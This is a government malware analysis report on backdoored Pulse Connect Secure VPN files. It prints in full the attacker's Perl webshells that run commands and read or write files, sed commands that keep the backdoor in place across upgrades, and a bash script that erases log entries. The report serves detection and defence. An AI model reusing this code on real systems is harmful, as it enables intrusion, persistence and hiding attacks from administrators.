MAR-10335467-1.v1: Pulse Connect Secure

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Description

CISA received eight files for analysis. These files are Pulse Secure system applications which have been modified by a malicious cyber actor. The primary purpose of these system modifications is to provide a remote operator command and control (C2) access over a compromised device running the modified Pulse Secure software. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of IOCs, see: MAR-10335467-1.v1.WHITE.stix.

Submitted Files (8)

1e862c3be851c984843f8b36e14decc1b25aed75e1bee4fd184ca70c4aaa7d56 (clear_log.sh)

463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9 (DSUpgrade.pm)

6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767 (DSUpgrade.pm)

829b3a9e91ed8c2a0a9d77ea9c4d8adeb0b815e03502d7b5d643400d3b0828bf (healthcheck.cgi)

859bfee6ebbc8823e998fe7140303292c2925f57a11368d1be5b393b1015f136 (compcheckjava.cgi)

c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69 (DSUpgrade.pm)

db389b866913e5af287eb3288cc1f5e8a114484bb9309cc05afbea8943d0887c (meeting_testjs.cgi)

e1efbc8b6ed320bc5762ebd6d59b8ba4c5792c4a6e7f3a605c8c7cb61fadd9a2 (licenseserverproto.cgi)

463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9

Tags

trojanwebshell

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

The file contains malicious code that was patched into the Pulse Secure application.



--Begin Legitimate Code--

sub extractPackage {

my ($path, $console, $html) = @_;

return "No content read from package file" if (-z $path);



$ENV{"DSINSTALL_PACKAGE"} = $path;



print $html "<li style=\"margin:6px;\">Step 1: Verifying package integrity ...";

print $console "Verifying package integrity ...";



local *FH;

my $prog = "/pkg/packdecrypt";

popen(*FH, "$prog $path /tmp/new-pack.tgz");



my $buffer;

my ($rin, $rout, $rerr) = ('','', '');

vec($rin, fileno(*FH), 1) = 1;

my $ts = time;

while (1) {

    my ($nfound, $timeleft) = select($rout=$rin, undef, undef, 1);

    if ($nfound) {

        my $n = sysread(*FH, $buffer, 64);

        last if !$n;

        print $html $buffer;

    }

    else {

        print $html '.';

        print $console ".";

    }

}

close(*FH);

--End Legitimate Code--



--Begin Malicious Code--

my $cgi_p="/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi";

my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";

system("/bin/mount -o remount,rw /dev/root /");

system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");

system("cp -f /tmp/installer/do-install /pkg/");

#system("cp -f /tmp/installer/VERSION /pkg/");

system("cp -f /tmp/installer/sysboot-shlib /pkg/");

system("cp -f /tmp/installer/losetup /pkg/");

print $html system("$cmd_x");

#print $html system("sed -i '/echo_console \"Saving package\"/i$cmd_x' /pkg/do-install");

system("rm -rf /tmp/installer");

my $td = time - $ts;

my $status = $? % 255;

if ($status == 0) {

   print $html " complete ($td seconds)</li>";

   print $console " complete\r\n";

}

else {

   print $html " failed</li>";

   print $console " failed\r\n";

}





return $status == 0;

}

--End Malicious Code--



The patched in code will leverage the following SED command to patch a malicious webshell into the Pulse Secure system file /pkg/do-install:



--Begin Malicious SED Command--

"sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";

--End Malicious SED Command--



The purpose of the webshell is to accept a parameter named "id" from within an incoming web application post. The webshell will then process the data provided within the "id" parameter as an operating system command by executing it locally utilizing the system() function.

db389b866913e5af287eb3288cc1f5e8a114484bb9309cc05afbea8943d0887c

Tags

webshell

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Common Gateway Interface (CGI) application with the following malicious code patched in. This code is designed to perform an initial check to determine whether data was passed into the web application within a parameter named "id". If this parameter is provided, the code will extract its contents and execute them on the target system using the sytem() function. If no "id" parameter is passed to the application, the code will simply execute the main() function of the original Pulse Secure application.



--Begin Patched In Malicious Code--

if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}

--End Patched In Malicious Code--

6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767

Tags

webshell

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Perl application that has been modified to add webshell script code into the content of the Pulse Secure Perl CGI script file "/root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi."



The script contains the following patched in commented out code:



—Begin Patched In Commented CGI Code—

###scriptstart

#/bin/mount -o remount,rw /dev/root /

#/bin/tar -xzf $innerarchive ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi

#/bin/tar -xzf $innerarchive ./root/home/perl/DSUpgrade.pm

#/bin/sed -i '/\#\#start_total/,/\#\#end_total/w 7CxA1p' outer-do-install

#/bin/sed -i '/DSINSTALL_CLEAN/r 7CxA1p' ./root/home/perl/DSUpgrade.pm

#/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w GqTv3w' outer-do-install

#/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w Vi6d8h4' outer-do-install

#/bin/sed -i '/^use DSUtilTable/r GqTv3w' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi

#/bin/sed -i '/^sub main/r Vi6d8h4' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi

#/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi

#/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi

#/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/#//' ./root/home/perl/DSUpgrade.pm

#/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/^/#/' ./root/home/perl/DSUpgrade.pm

#/usr/bin/gzip -d $innerarchive

#/bin/tar -f /tmp/inside-package.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi

#/bin/tar -f /tmp/inside-package.tar -u ./root/home/perl/DSUpgrade.pm

#/bin/rm -f 7CxA1p

#/bin/rm -f GqTv3w

#/bin/rm -f Vi6d8h4

#/bin/rm -fr root

#/usr/bin/gzip -c /tmp/inside-package.tar > $innerarchive

###scriptend



###cgistart1

#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib";

#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib/MIME/Base64";

#use Crypt::RC4;

#use MIME::Base64 ();

#

#sub parse_parameters ($) {

# my %ret;

#

# my $input = shift;

#

# foreach my $pair (split('&', $input)) {

#    my ($var, $value) = split('=', $pair, 2);

#    

#    if($var) {

#     $value =~ s/\+/ /g ;

#     $value =~ s/%(..)/pack('c',hex($1))/eg;

#

#     $ret{$var} = $value;

#    }

# }

#

# return %ret;

#}

###cgiend1



###cgistart2

#    my $enckey='1234567';

#    my $data='1234567812345678';

#        my $cipher = RC4($enckey, $data);    

#        my $encode = MIME::Base64::encode($cipher);

#    my $psalLaunch = CGI::param("serverid");

#    if ($psalLaunch =~ /csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa/)

#    {

#    my ($cmd, %FORM);

#

#    $|=1;

#

#    print "Content-Type: text/html\r\n";

#    print "\r\n";

#    %FORM = parse_parameters($ENV{'QUERY_STRING'});

#

#    if(defined $FORM{'cmd'}) {

#     $cmd = $FORM{'cmd'};

#    }

#

#print '<HTML>

#<body>

#<form action="" method="GET">

#<input type="text" name="cmd" size=45 value="' . $cmd . '">

#<input type="text" name="serverid" size=45 value="csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa">

#<input type="submit" value="Run">

#</form>

#<pre>';

#

#if(defined $FORM{'cmd'}) {

# print "Results of '$cmd' execution:\n\n";

# print "-"x80;

# print "\n";

#

# print $encode;

# system $cmd;

# print "-"x80;

# print "\n";

#}

# print "</pre>";

# exit(0);

#    }

###cgiend2



##end_total

--End Patched In Commented CGI Code--



The Pulse Secure Perl script also contains the following suspicious live/uncommentedcode. This code is designed to modify several Pulse Secure system files using the SED command as well as attempt to install code from within an archive named new-pack.tgz expected to be currently stored on the target system.



--Begin Patched In Live/Uncommented Code--

sub installPackage {

my ($clean, $console, $html) = @_;



$ENV{"DSINSTALL_CLEAN"} = $clean;



##start_total

##perlstart

system("/bin/mount -o remount,rw /dev/root /");

system("/bin/tar -xzf /tmp/new-pack.tgz ./installer/outer-do-install");

my $statushh = $? % 255;

if( $statushh != 0 )

{

       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");

       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/perl/DSUpgrade.pm");    

       system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w K872Bu' /home/perl/DSUpgrade.pm");

       system("/bin/sed -i '/DSINSTALL_CLEAN/r K872Bu' ./root/home/perl/DSUpgrade.pm");

       system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w Mj1Za' /home/perl/DSUpgrade.pm");

       system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w 1uMfVB' /home/perl/DSUpgrade.pm");

       system("/bin/sed -i '/^use DSUtilTable/r Mj1Za' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");

       system("/bin/sed -i '/^sub main/r 1uMfVB' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");

       system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");

       system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");

       system("/usr/bin/gzip -d /tmp/new-pack.tgz");

       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");

       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/perl/DSUpgrade.pm");

       system("/bin/rm -f K872Bu");

       system("/bin/rm -f Mj1Za");

       system("/bin/rm -f 1uMfVB");    

       system("/bin/rm -fr root");

       system("rm -f /tmp/new-pack.tgz");

       system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");                                        

}

else{

system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w Nc3Gy.pm' /home/perl/DSUpgrade.pm");

system("/bin/sed -i '/packdecrypt/r Nc3Gy.pm' ./installer/outer-do-install");

system("/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/^/#/' ./installer/outer-do-install");

system("/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/#//' ./installer/outer-do-install");

system("/usr/bin/gzip -d /tmp/new-pack.tgz");

system("/bin/tar -f /tmp/new-pack.tar -u ./installer/outer-do-install");

system("rm -f Nc3Gy.pm");

system("rm -f /tmp/new-pack.tgz");

system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");

system("rm -fr installer");

}

--End Patched In Live/Uncommented Code--



Analysis indicates this live/uncommented code is designed to present a web form to a remote operator, wherein the remote operator can enter commands that will be run locally on the target system. The live/uncommented code also has the capability to modify several Pulse Secure system files utilizing the SED command.

829b3a9e91ed8c2a0a9d77ea9c4d8adeb0b815e03502d7b5d643400d3b0828bf

Tags

webshell

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI script that contains malicious code that was patched into the file. The modification modifies the file to become a webshell. The following code includes comments that provides information on the capabilities of this patched webshell:



--Begin Malicious Code--

if ($ENV

{

'REQUEST_METHOD'

}                                            //CISA COMMENT: $ph variable contains RC4 crypto key

eq "POST") $ph="[REDACTED]";

sub r             //CISA COMMENT: Generate random block of data

{

my $n=$_[0];

my $rs;

for (my $i=0;$i<$n;$i++)

{

    my $n1=int(rand(256));

    $rs.=chr($n1);

}

return $rs;

}

sub a             //CISA COMMENT: RC4 / BASE64 decryption function

{

my $st=$_[0];

my $k=r(6);

my $en = RC4( $k.$ph, $st);

return encode_base64($k.$en);

}

sub b         //CISA COMMENT: RC4 / BASE64 decryption function

{

my $s= decode_base64($_[0]);

my $l=length($s);

my $k= substr($s,0,6);

my $en=substr($s,6,$l-6);

my $de = RC4( $k.$ph, $en );

return $de;

}

sub c                     //CISA COMMENT: Download File from target system

{

my $fi=CGI::param('img');

my $FN=b($fi);

my $fd;

print "Content-type: application/x-download\n";

open(*FILE, "<$FN" );

while(<FILE>)

{

    $fd=$fd.$_;

}

close(*FILE);

print "Content-Disposition: attachment; filename=tmp\n\n";

print a($fd);        //CISA COMMENT: RC4 ENCRYPT and BASE64 encode file before giving it to operator

}

sub d.

{

print "Cache-Control: no-cache\n";

print "Content-type: text/html\n\n";

my $fi = CGI::param('cert');                    //CISA COMMENT: 'cert' contains name of the file to be written.

$fi=b($fi);

my $pa=CGI::param('md5');                 //CISA COMMENT: 'md5' contains the content to be written to file.

$pa=b($pa);

open (*outfile, ">$pa");

print outfile $fi;                                     //CISA COMMENT: The content is written to the file.

close (*outfile);

}

sub e     //CISA COMMENT: Decrypt and execute provided system command

{

print "Cache-Control: no-cache\n";

print "Content-type: image/gif\n\n";

my $na=CGI::param('name');

$na=b($na);    //CISA COMMENT: Base64 decode and RC4 decrypt incoming command

my $rt;

if (!$na or $na eq "cd")

{

    $rt="Error 404";

}

else

{

    my $ot="/tmp/1";

    system("$na >/tmp/1 2>&1");     //CISA COMMENT: Execute decrypted command

    open(*cmd_result,"<$ot");

    while(<cmd_result>)

    {

    $rt=$rt.$_;

    }

    close(*cmd_result);

    unlink $ot

}

print a($rt);

}

sub f

{

if(CGI::param('cert'))

{

    d();

}

elsif(CGI::param('img') and CGI::param('name'))

{

    c(); //CISA COMMENT: Download file from system

}

elsif(CGI::param('name') and CGI::param('img') eq "")

{

    e(); //CISA COMMENT: Decrypt and execute provided system command

}

else

{

    &main();

}

}

if ($ENV

{

'REQUEST_METHOD'

}

eq "POST")

{

f();

}

else

{

&main();

}

--Malicious Code--



The webshell is capable of allowing a remote operator to read and write files on the target system. It is also capable of allowing the remote operator to pass system commands to the target system which will be executed as system commands. The data passed to and from this webshell by the remote operator will be RC4 encrypted with a hard coded RC4 key.

1e862c3be851c984843f8b36e14decc1b25aed75e1bee4fd184ca70c4aaa7d56

Tags

webshell

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This malicious file contains the script illustrated below:



—Begin Script—

#!/bin/bash



declare -A dic

dic=(

[events]=log.events.vc0

[user_access]=log.access.vc0

[admin_access]=log.admin.vc0

)



if [ $# = 2 ]; then

for log in ${!dic[@]};

do

   if [ $1 = ${log} ]; then

    for I in "8" "9" "a" "b" "c" "d" "e" "f";do

       for J in "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" "a" "b" "c" "d" "e" "f";do

        sed -i "s/.\x00[^\x00]*$2[^\x00]*\x09.\x00//g" /data/runtime/logs/${dic[${log}]}

        sed -i "s/\x$I$J\x00[^\x00]*$2[^\x00]*\x09\x$I$J\x00//g" /data/runtime/logs/${dic[${log}]}

       done

    done

   fi

done

# sed -i "s/.\x00[^\x00]*$1[^\x00]*\x09.\x00//g" log.events.vc0

else

   echo "usage: /home/bin/bash clear_log.sh [logfile] [keyword(regex)]"

fi

—End Script—



This script is designed to allow a malicious operator to modify the following log files on a Pulse Secure system:



—Begin Log Files—

log.events.vc0

log.access.vc0

log.admin.vc0

—End Log Files—



It is presumed the operator will leverage this utility to hide malicious cyber actor activity carried out on target Pulse Secure devices.

859bfee6ebbc8823e998fe7140303292c2925f57a11368d1be5b393b1015f136

Tags

webshell

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI application with the following malicious code patched in:



--Begin Malicious Code--

if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}

--End Malicious Code--



This patched in code is designed to perform an initial check to determine whether data was passed into the web application within a parameter named "id". If this parameter is provided, the code will extract its contents and execute them on the target system using the sytem() function. If no "id" parameter is passed to the application, the code will simply execute the main() function of the original Pulse Secure application.

e1efbc8b6ed320bc5762ebd6d59b8ba4c5792c4a6e7f3a605c8c7cb61fadd9a2

Tags

webshell

Details

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI application with the following malicious webshell code patched in:



—Begin Patched Main Function—

##cgiend1

sub main {

##cgistart2

   my $enckey='1234567';

   my $data='1234567812345678';

       my $cipher = RC4($enckey, $data);    

       my $encode = MIME::Base64::encode($cipher);

   my $psalLaunch = CGI::param("serverid");

   if ($psalLaunch =~ /csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa/)

   {

   my ($cmd, %FORM);



   $|=1;



   print "Content-Type: text/html\r\n";

   print "\r\n";

   %FORM = parse_parameters($ENV{'QUERY_STRING'});



   if(defined $FORM{'cmd'}) {

    $cmd = $FORM{'cmd'};

   }



print '<HTML>

<body>

<form action="" method="GET">

<input type="text" name="cmd" size=45 value="' . $cmd . '">

<input type="text" name="serverid" size=45 value="csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa">

<input type="submit" value="Run">

</form>

<pre>';



if(defined $FORM{'cmd'}) {

print "Results of '$cmd' execution:\n\n";

print "-"x80;

print "\n";



print $encode;

system $cmd;

print "-"x80;

print "\n";

}

print "</pre>";

exit(0);

   }

—End Patched Main Function—



This malicious code is a replacement to the legitimate main function. This modified main function will check to see if a parameter named “serverid” is provided to the web application. If it is, it will parse out the parameter data and execute it on the target system using the system() function. This code effectively modified the functionality of this legitimate Pulse Secure web application to allow a remote operator to execute system commands on a compromised system.

c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69

Tags

trojanwebshell

Details

Antivirus

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Perl application with the following malicious code patched in:



—Begin Malicious Patched In Code—

sub extractPackage {

my ($path, $console, $html) = @_;

return "No content read from package file" if (-z $path);



$ENV{"DSINSTALL_PACKAGE"} = $path;



print $html "<li style=\"margin:6px;\">Step 1: Verifying package integrity ...";

print $console "Verifying package integrity ...";



local *FH;

my $prog = "/pkg/packdecrypt";

popen(*FH, "$prog $path /tmp/new-pack.tgz");



my $buffer;

my ($rin, $rout, $rerr) = ('','', '');

vec($rin, fileno(*FH), 1) = 1;

my $ts = time;

while (1) {

    my ($nfound, $timeleft) = select($rout=$rin, undef, undef, 1);

    if ($nfound) {

        my $n = sysread(*FH, $buffer, 64);

        last if !$n;

        print $html $buffer;

    }

    else {

        print $html '.';

        print $console ".";

    }

}

close(*FH);

my $cgi_p="/home/webserver/htdocs/dana-na/meeting/meeting_testjs.cgi";

my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";

system("/bin/mount -o remount,rw /dev/root /");

system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");

system("cp -f /tmp/installer/do-install /pkg/");

system("cp -f /tmp/installer/VERSION /pkg/");

system("cp -f /tmp/installer/sysboot-shlib /pkg/");

system("cp -f /tmp/installer/losetup /pkg/");

system("$cmd_x");

system("rm -rf /tmp/installer");

my $td = time - $ts;

my $status = $? % 255;

if ($status == 0) {

   print $html " complete ($td seconds)</li>";

   print $console " complete\r\n";

}

else {

   print $html " failed</li>";

   print $console " failed\r\n";

}





return $status == 0;

}

—End Malicious Patched In Code—



The patched in code will leverage the following SED command to patch a malicious webshell into the Pulse Secure system file /pkg/do-install:



--Begin Malicious SED Command--

"sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";

--End Malicious SED Command--



The purpose of the webshell is to accept a parameter named "id" from within an incoming web application post. The webshell will then process the data provided within the "id" parameter as an operating system command by executing it locally utilizing the system() function.

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

• Maintain up-to-date antivirus signatures and engines.
• Keep operating system patches up-to-date.
• Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
• Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
• Enforce a strong password policy and implement regular password changes.
• Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
• Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
• Disable unnecessary services on agency workstations and servers.
• Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
• Monitor users' web browsing habits; restrict access to sites with unfavorable content.
• Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
• Scan all software downloaded from the Internet prior to executing.
• Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

• 1-888-282-0870
• CISA Central (UNCLASS)
• CISA SIPR (SIPRNET)
• CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Central.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

• Web: https://malware.us-cert.gov
• E-Mail: submit@malware.us-cert.gov
• FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.